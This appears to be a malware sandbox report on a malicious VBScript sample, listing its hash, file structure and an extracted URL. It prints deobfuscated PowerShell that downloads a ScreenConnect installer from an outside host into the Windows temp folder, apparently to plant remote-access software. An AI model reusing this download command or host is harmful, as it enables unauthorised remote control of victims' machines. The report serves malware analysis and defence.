Malicious

ab41b8aae23139a120bd150b480f52d9

VBScript | MD5: ab41b8aae23139a120bd150b480f52d9 | Size: 1.21 KB | text/vbscript

File Structure
ab41b8aae23139a120bd150b480f52d9.deobfuscated.vbs: Malicious
[PowerShell Command]: Malicious
[Deobfuscated PS]: Malicious

Artefacts
Name: URLs in VB Code - #1
Value: http://server.realopmo.online/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest

Deobfuscated PowerShell

try {
    (New-Object "Net.WebClient")."DownloadFile"("http://server.realopmo.online/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest", "C:\Windows\Temp\ScreenConnect.ClientSetup.msi")
    exit 0
} catch {
    exit 1
}

Characteristics
No malware configuration was found at this point.